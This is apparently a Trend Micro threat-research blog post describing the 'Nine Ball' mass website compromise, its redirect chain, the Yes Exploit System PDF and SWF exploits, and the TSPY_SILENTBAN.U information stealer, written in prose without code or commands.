The hype after recent mass compromises has not even died down yet and already another massive attack has been launched. Trend Micro was alerted to the emergence of another mass compromise, dubbed Nine Ball, for the same reason Gumblar was named Gumblar. This time, however, the Nine Ball domain was only one of hundreds of landing pages users could be redirected to.
As reported by Ivan Macalintal, Trend Micro Threat Research Manager, the infection starts when a user accesses a compromised site that automatically redirects him/her to several sites. These sites were actually a trio of malicious domains (specific .KZ and .TW sites) constantly used by attackers in their scheme of redirecting users to a malicious IP address registered somewhere in the Ukraine.
The chain ends when the user’s browser lands on a page that contains exploits for vulnerabilities in various software including Adobe Acrobat and Shockwave. Advanced Threat Researcher Joey Costoya also pointed out that a previously reported PoC in Office OCX Word Viewer is also among the exploits used in this attack.
Compromised websites were injected with blocks of obfuscated script, detected as JS_DLOADR.ALP (see Figure 1):
The number of blocks can be as many as seven to eight, which can be seen in the snapshot below of a compromised site of a Web hosting provider in Hong Kong. Hosting provider? Yikes!
The user will then be redirected to a series of websites that use referrers to avoid detection and subsequent removal. The infection chain ends when the user is finally redirected to an exploit-laden landing page.
The final pages in the infection chain, Costoya also reported, are part of a Web exploit toolkit called Yes Exploit System, which includes .PDF and .SWF exploits, detected as TROJ_PDFEX.J and TROJ_SWFLDR.AB, respectively.
Both .PDF and .SWF files lead to binary payload that look similar to a new kind of information stealer detected as TSPY_SILENTBAN.U. TSPY_SILENTBAN.U installs itself as a Browser Helper Object (BHO) on the affected system and monitors Internet activity. Gathered information are then sent to a remote user using HTTP POST.
Note that as of this writing, the binary payload retrieved from the attack uses this spyware. It is more likely that in future attacks, other payloads can be used.
Information on the vulnerabilities exploited in this attack can be found on the following pages:
Users are also strongly advised to update their software in order to avoid being affected by this attack.